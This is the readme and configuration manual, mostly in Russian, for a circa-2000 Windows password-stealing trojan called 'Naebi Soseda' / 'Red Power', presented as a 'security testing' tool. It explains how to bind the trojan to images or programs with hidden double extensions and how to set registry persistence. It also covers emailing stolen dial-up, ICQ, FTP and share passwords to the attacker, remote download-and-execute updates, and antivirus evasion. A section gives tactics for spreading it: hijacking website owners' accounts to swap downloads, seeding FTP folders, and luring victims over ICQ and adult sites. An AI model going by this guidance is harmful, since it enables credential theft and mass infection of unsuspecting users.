English

Наеби Соседа (с) 2.41

(1 Июля 2o0o) Средтво для анализа защищенности компьютера. NEW: Now support posting email via sock5 or ever HTTP proxyes settings: At main dialog press [ Advansed & SMTP] dialog ,next type fill SMTP Server field as for HTTP proxy.lame.edu:3128:mail.lame.edu
proxy port smtp_server for SOCKS5 sock.lame-net.jp:mail.smtp.com
sock5-proxy smtp_server
PS:http proxyes MUST allow CONNECT method.And allow CONNECT to specified adrress from target host.Verify it before make settings. ------------------------------------------------------------- Теперь поддерживается посылка email через SOCKS5 и даже HTTP- прокси ( через метод CONNECT) Для этого в главном окне программы нажмите на кнопку [ Advansed & SMTP] ,а в открышемся диалоге заполните поле SMTP сервер как показано ниже. Для HTTP-прокси proxy.lame.edu:3128:mail.lame.edu прокси порт почтовый сервер прокси Для SOCKS5 sock.lame-net.jp:mail.smtp.com прокси почтовый сервер ЗЫ: HTTP-Proxy должны поддерживать метод CONNECT и позволять его использование.Кроме того для успешной работы необхдоимо чтобы они разрешали использование с адреса проверяемой на уязвимость машины .Проверьте это перед данными настройками.
NEW 28.02 AGuard - уже не спасет от наших лошадей.
Новый список из 10 SMTP , один из которых настраиваем ... для это жмите SMTP & Advanced settings SMTP - сервер через который посылать он должен либо давать всем(RELAY) либо давать посылать с того мыло которое вы указали во FROM один пример win.CHAT.RU -> webmater@CHAT.RU ( or xakep@CHAT.RU) еще один mail.mail.ru -> vasya@MAIL.RU - это правильно пример неправильного mail.NEVALINK.RU -> null812@DUX.RU - разные домены потому сервер\ пошлет на .... а не вам пароли
Eсли вы не знаете что такое СМТП и зачем это надо оставьте
все как есть там есть уже какое то количество встроенных.
Еще одно я очень рекомендовал бы использовать Sendmail -smtp сервер в ответ на HELO HOSTNAME он говорит HELLO dns [ ip -adress ],рад тебя видеть именно это я использую в заголовкe вместо того чтоб тормозить и лезть в днс самому.Если вы пользуете M$ eXchage или еще какой bullshit то он на все говорит 250 ok,потому вместо субьекта вы видете ... имя-машины@X ЛИШЬ-IP 1. функции : Недостатки конфигурации системы безопасности персонального компьютера или сети ЭВМ определяемые этой программой: возможноть получть: пароли на диалап (co CkpunTaMu n Teлефонами) пароль на iCQ - now with ICQ 99 3.xx (<.19) support пароли из pwl-кеша пароли программы СuteFtp/WinComander-FTP(исправлено к 3.0) Пароль порт итд установленного если есть * Трояна BackOrifice 1.2 * Трояна NetBus 1.7 * Трояна NetSpheare * Каких других троянов (выводится их список и делается попытка определить их порты и пароли) пароль из Edialer(в процессе ..в той версии которая у вас или еше ..или только edialre.ini или уже пароль крипт там примитивнейший for(int i =0;u[i];i++)u[i]=u[i] + i ); кое-что интересное с рабочего стола .. само-апдейт(ура добавлен ..о глЮках пишите если что) имя_машины@ интернетный_адрес_машины [внутренний_аддресс] (например mashine@ the.firewall.gov.ru [10.0.4.16]) ^^^^^ вот это определяет СМТП! так что смотрите что за смтп прописываете что значат значки - > - дальше пароль на диалап с телефоном итд *# -Cuteftp passwords *Rna - пароли на диалапы или _ВНЕШНИЕ_ расшаренные ресурсы >? - Пароли на шары самой машины на которой выполнялся конь #! - номера асек [размер файла с message history]<пароль>(CryptIV) >Reg - содержимое интересных мест регистра. [размерфайла] описание : файл : полный -путь до ?:87ц45р5:port444:pass666:: - попытка определения настроек трояна если это "наверно_троян"

Комплект поставки :

serv241.rar - сами _несконфигуренные_ трояны conf.exe - конфигуратор (текстовый) ( size = 6656 bytes ) conf.c - ~исхдоники~ конфигуратора сonfGui.exe - графический конфигуратор ( size = 24064 bytes ) сonfGUI.c - [ Ask for it .. if u need it ] сonfig.ini - файл которым будет произведина конфигурация теперь лишь в случае использвания текстого конфигуратора. ОТРЕДАКТИРУЙТЕ его перед конфигурированием! В графическом данные берутся из диалога вызываемого нажатием на кнопку [Advanced Settings]
2.Принцип работы: пассивный - анонимный Данная программа не предупреждает обьекты исследования о проводимой проверке. программа не ждет какого либо соединения из вне а сама еже 3-5 дневно присылает указаную информацию с компьютера где она выполняется по протоколу SMTP на Ваш email. * время активного состояния (Run) ~ 1-2 минуты раз в три дня (в остальное время она тихо ждет своего часа и не видна в списке задач по ProcessFirst/ProccessNext ,так как в это время не выполняется) 3. Этически-правовая сторона. Программа предназначена исключительно для мониторинга удаленного компьютера и изучения работы подобного класса программ, при условии невыхождения данной дейтельности за рамки текущего законoдательства. Данный программный продукт распространяется FreeWare и AS IS что означает что автор не берет на себя ответвенности за возможный ущерб/прибыль возникшей или могущей возникнуть при его изпользовании третьими лицами. Программа предоставляется исключительно в _некомерческих_ личных целях ,и при условии неприченения морального или финансового ущерба рабочему классу.(Так как буржуи людьми не считаются,то ебите этих сук,продавших Россию/Украiну/Белорусию/ВашуРодину с чистой совестью;-) Это законно ,не взирая на их так называемые "буржуйские законы") Программа не может и не должна быть использована для извлечения коммерческой прибыли.В случае обнаружения данной дейтельности со стороны третьих лиц незамедлительно информируйте меня, органы правобезпорядка, и(или) просто чистьте им рыло :) Мы не бандиты с большой дороги -- потому в наших рядаx не должно быть и не будет МАРОДЕРОВ -- казлов саблезубых продающих спертый у бедных студенток(ов) интернет, купленный ими на _СВОИ_ последнии деньги $$детишкам$$-маЖорам тех самых продавцов нашей Poдины. 4.Как настроить: Advanced&SMTP после прочтения этого файла [Email] * настройте программу на ваше мыло или ICQ (формат в этом случае такой) <ваш УИН>@pager.icq.com например 39871234@pager.icq.com или vasia@host.com Треугольных скобочек писать НЕНАДО или ваш адрес в ФИДо a@pXXX.fXXXX.nXXXX.z2.fidonet.org например b@p666.f1024.n5020.z2.fidonet.org - не пишите слева от собаки Vasia.Ivanovich.Pupkin@ смотрите ниже ПОЧЕМУ! !!!!! Внимание мыла на _ситеке_ брать НЕЛЬЗЯ - !!!!! он считает пришедшее спамом и рубит в капусту ;( !!!!! Внимание длина мыла = до 63 символов.. !!!!! до это 0-63 .. так что не_Hадо брать мыла типа !!!!! Vasisualiy.Ivanovich.Pupkin-1@p5.r6.zzz666.hotmail.com !!!!! Будьте проще -- и мылы потянутся к вам =) [TrohanFile] * выберите файл-сервер которым будут заражаться выбранные вами файлы в комплекте поставки находится сервер (ns241.exe) [AttachTo:] * после этого выберите на диске файл к которoму полагается приписать сервер и нажмите [Ok] . @NFO:
                         ~  * * *   ~
     ЭТО МОЖЕТ БЫТЬ КАК ОБЫЧНЫЙ exe-шник ТАК и ЛЮБОЙ ДРУГОЙ 
     ТИП ДОКУМЕНТА.
     Например вы можете соединить троян с картинкой и при запуске
     полученного файла на экране появится картинка (а где то тихо в фоне
     троян будет делать свое черное дело)
[Advanced Settings] - Теперь вызывается вполне понятное окно диалога Advanced & SMTP где вы и можете выбрать необходоимые дополнительные насторйки Что должно или не должно быть в каждом из полей ввода данной формы? ____ 1)| [x] ChekBoxes Слева - в какое место прописывать себя в рeестре | [ ] жертвы для запуска трояна на его машине вновь и вновь. | [ ] | [ ] Если значение каких то ключей там вам непонятны то РАЗВЫДЕЛИТЕ их | или оставьте так как они стоят по умолчанию. | [x] 2) | [ ] DeleteSelf - стирать ли присланный вами файл состоящий из трояна ___ и приаттаченного к него файла(и только в этом случае) распаковывая его содержимое на составные части а именно - чистого трояна в SYSTEM ( ну или куда вы выберете ) фотку в ту диру где лежал присланный троян. Делать это не рекомендуется [ ] пока ибо а) это может глючить б) как вы относитесь к новым файлам в систем? А вот exe-шники скаченные $уй знает откуда пускает регулярно даже не удосуживший перед этим F3 .. 3) ID: уникальный идентифкатор программы - нужен а) вам чтоб различать ваши троянизированные обьекты вы положили 10программ и раздали 20фоток - надо ж знать какая ИМЕННО пользуется успехом - или а не глючит ли как то сам СЕРВЕР наеби? б) в будуюшем самой программе наеби - ибо упдейтиться она будет не .EXE как сейчас а .HTM(.TXT? .FUCK ?) содержащим команды например IF (ID = FORMATER1) DELETE *.* ELSE UPDATE "newver.exe" итд 4) Как назвать у жертвы - имя файла лежащего где то в системе у наивного ламера 5)Как обозвать в реестре: В реестре будет строчка "что - то выбраное тут","полный-путь-до\как-вы-назвали-трояна" 6)Куда копироваться пока две опции Windows/System - выбор где будет жить чистый троян у жертвы Как настраивать урл:

  
   В поле URL _можно_ прописать _полный_ урл до _EXE_ФАЙЛА_ содержащего код сервера НАЕБИ
   _сконфигуренного_уже_ на желаемое(обычно новое ВАШЕ) мыло .
   Наеби будет каждый свой старт после отсыла емайла вам пытаться скачать этот файл 
   переименовать его в что-то.ехе и выполнить (потому не ставьте туда ссылок на всякую
   $уйню типа  http://www.мой-сайт.ru/~мояСтраница/ or C:\\k33wl_hAck\index.html итд
    
ЕСли вы не используйте это поле - у вас нет сайта - вы не хотите UPDATEов то _ЗАМЕНИТЕ_ то что там стоит по умолчанию на пустую строку . Еще раз скачивать будет EXE - that mean http://www.bullshits.net/~fuck/index.html is INCORRECT - it not redirect a user to u page.It just next time download and run selected file.Хорошо что он переименовыается(что вообщето бага) а то преставьте себе радость пользователя от WinExeс("ХТМЛ_С_ВАШИМИ_ТРОЯНАМИ"); =) Так же можете конфигурировать и тектовой версией конфигуратора -(исходники прилагаются) Формат вызова conf ns238.exe masha.jpg (conf trojan [attached-file] Настройки (включая емайл) в этом случае считываются и файла config.ini курентоной директории.. связи между мылом в форме и мылом в ини НИКАКОЙ ~ Сконфигурированная програма готовая к передаче жертве мониторинга находится в поддиректории InFeCteD той же директории что и исходная соединяемая с Трояном, с тем же именем. Если же вы использовали в качестве полезной части другой тип документа то расширение .exe будет добавлено автоматически после n-ого количества пробелов необходимого для рассылки по Ай Си КьЮ. Например C:\fuck\nuke.exe --become---> C:\fuck\InFeCtEd\nuke.exe C:\pussy\xxx\1.jpg --become---> C:\pussy\xxx\InFeCtEd\1.jpg .exe Все содержимое InFecTed - это готовые к рассылке трояны ~NEW Mыло и все остальное можно настроить и в ручную - не запуская у себя на машине никаких ехе. Как ? Смотрите исходник конфигуратора коTорый теперь прилагается. Вы можете сами его модифицировать ,компилировать итд. В следующих версиях могут измениться лишь способ "шифрования" информации структа данных настройки и относительное смещение FSIZE Свои варианты модификаций конфигуратора если вы считаете их достойными внимания широкой публики или только меня мыльте на email: нету-пока (or send via ICQ) ~ Все:после этого программу нужно запустить любым из известных вам способов на компьютере жертвы .И регулярно проверять вашу почту ;-)
Раздел How to ведется по письмам пользователей программы автору. Советы предоставлявляются с их согласия.Автор программного продукта не может поручиться за их работоспособность законность с точки зрения закона дейтвующего на вашей территории,а так же за возможный ущерб/прибыль полученную или упущенную в результате следования или неследования им. Вы можете их (не) использовать AS IS 5. How to: + Сменить иконку? например программой MicroAngelo которую можно скачать тут
http://ftpsearch.city.ru:8000/ftpsearch?query=Microangelo&doit=Search или каким нибудь еще редактором ресурсов. ABTOP: "В новых версиях это будет делать сам конфигураTор + Наиболее полно оценить профпригодность проверяемых (ламеров) @nFO Существует множество способов как доставить троян к жертве.Большинство из вас наверняка строили сайты с полезными программами (дополненные разумеется трояном ;-) ..Но у них не так много посителей да закрываются они БыСтРО .. * Но есть способ проше . Шаг 1. Наебываем владельца в меру популярного сайта (лучше если там выложены действительно полезные програмы) например используя ошибку с кучей пробелов icq и outlooke или как либо иначе. Шаг 2. Используя его пароль заменяем программы на ЕГО сайте на их зараженные Наебщиком всех окрестных соседей версии. Вуаля -- используя его чесное имя вы наебываете тысячи ..ничего неподозревающих людей ;~-) * Разновидностью этого способа является раскидывания зараженных файлов по доступным на чтение!/запись местам ftp-serverov ( как правило Incoming) Это должно быть то(называться так) что(как) ищут часто и все .. Теперь запустив ftp-search ..потенциальная жертва может найти и ваш файл * Email: новости: оутлук на файлы с двумя расширениями и пробелами между реагирует также - не показывает не хрена... Ваша забота только придумать максимально правдA-подобную ЛЕгЕНДУ почему жертве HADO запустить файл... Как показывает опыт на ура идут фотки ,price-liсты .. предложения работы итд -- сами догадайтеь в каком формате ;-) * Совсем старо -- но помойму действенно ..на сайте xxx- содержания обвешаного баннерами всех каких только можно систем итд кладется 10-20 фоток ххх-содержания (ссылками на) и внизу ссылку привлекающую внимание - типа "Не НАЖИМАЙ СЮДА" ;-) А там video.exe - клиент обкончавшись от приведущего сначала запустит это а потом уже ... подумает ;-) Тупо - но работает на ура;) (Ну или немного боллее сложные варианты того же используя АктивX vb-script итд) Рассчет на то что мастурбирующий кретин соображать не способен оправдывает себя на 99.9% ;-) * Что то совсем оригинальное и ваше -- расскажите об этом (если хотите приватно .. мне на асю ) возможно при Ёбли вашим способом можно достичь лучших результатов. ABTOP: Возможно для это способа не плохо было б видоизменить и самy программу - пишите --- ВиДОИЗМЕНИМ ;-) 6. В случае обнаружения программы антивирусами тут же пишите на мой емайл ( -CLOSED-@-.- )/орите на UIN = 33945031 поправим и вышлем вам обновления. Это обеспечивает более высокий уровень требований к проверяемому таким образом персоналу. Если же уровень знаний/системы безопасности заведомо этого ниже,то можно применить приведушую версию ПО успешно находимую и нейтрализуемую антивирусами. Теперь (надеюсь) достаточно положить обновление по тому урл который прописан в программе(настраивается в config.ini-файле ) старая версия сама скачает и запустит новую. Что позволит вам правильно выбрать Антивирусное ПО для комплексной защиты вашего компьютера в дальнейшем. 7. Новый сайт находится на XBX.RIAL.NET/naebi - 8. Как нейтрализовать возможность установки и работы данной(и подобного класса в том числе вредоносных) программ?(И тем самым оправдать ее предназначение тестировать ЭВМ и Сети ЭВМ на предмет безопасности) Не принимать ненужные не заказываемые Вами файлы по e-mail,icq,irc и другим средствам передачи информации.Иметь правильно сконфигуренный фаервол установленный на безопасной системе(в часности например на базе UNIX -подобных ОС) Правильно выбрать и настроить программное обеспечение в часности smtp,proxy, средства защиты ,антивирусное ПО. Человек ответсвенный в вашей организации за компьютерную безопасность должен _регулярно_ обьяснять персоналу основы безопасной работы в интернет. Естественно что данный специалист должен обладать достаотчными опытом и знаниями для ведения как разьяснительной так и иной работы. http://xbx.rial.net/naebi UIN = 33945031 Regards , Dr.NuLL //RHF "Red Power" Trojan This programm designed for grab all passwords from victim computer and send to attacker e-mail. When victim will fucked , you should recieve. * Dialups Password * ICQ passes (up to 3.17) * Local Network Shares Pass * pass to www,ftp etc sites , other mashine shares (as long as it was stored in victims PWL's) * Full UIN list with _PASSWORD_ for ever of it. * BO-trojan,NetBus-Trojan,NetSphere-Trojan ports&passwords * Ftp password stored in CuteFTp/WinCMD ftp(if enable one) * other staff like edialer passes(stupid dialer used mostly in Russia Land) , list of Run* keys in victim registry (for depend what numbers of other trojan instaled),and all .txt(_NOW_ .lnk to .txt from RECENT - to) from victim DeskTop Etic of Prog : This proggi not more inlawful than ours Goverments. But do not fuck up innocent as child victim. (It not mean's don't fuck fat-stupid lame "burgers" ;) It lawful as far as the World ruled by motherfuckers,who call themselves "Goverment",and as far as world consist of the richs and the poors. How to config: Is 3 Fields in CONFIGurator dialog box: [email:] type here your email, in when u will receive grabben logins [trohan-file:] the Red Power server,wich u will use (at should be in most cases a ns2342.exe) - press this button and chose it from your disk [attach to:] It can be ANY DOCUMENT. Not only victim attach proggi. You can chose for example a JPEG photo , and when victim run resulting "somefile.jpg .exe" he should to see this picture. PS : try to send "somefile.jpg .exe" file via icq..Realy nice? Yeh ;)) [advansed settings] - allow to edit configuration file * Url = "url from what prog try to self-update" * E-mail = "your@email" -depend only for test progs * HKLM_Run , etc - a place for proggi write self registry (better is do not change degfault value) * Id ="prog1" - unical prog - depend indentifecator , for make easy statistic for you , only 8 letters long * trojname ="kernel64" - how prog will be named at %system% WITH0UT a ".exe" ! , only 8 letters long * desc ="Very needable system module" - a description in the lamer registry Other configurable values planning but not released yet.. After all this steps was done press a [ok] key and see at %DIR_WITH_VICTIM_FILE%/InFeCted/ the file named same as original not infected file.. That all folks... ;) Now u ready to send resulting file via various way. An Example of: ICQ(Not from self-uin of course,grab it first for good weel known victim ;),E-mail,Make self WWW with infected programm, or u can infect program in otherselfs sites(pass for it u grab first from they owners) Is moreover way for set this hourse,now easyes is send a "coolGirl.jpg .exe" file via ICQ. And most hardly is write a ExPloIT to some WINDOWS prog like iishack annonsed in mid jun by E-Eye team ;) PS If u looking for troj-virus more better than that go to http://www.move.to/weird - and get a kuang-virus - it's best. Best Regards,Dr.Null //RHF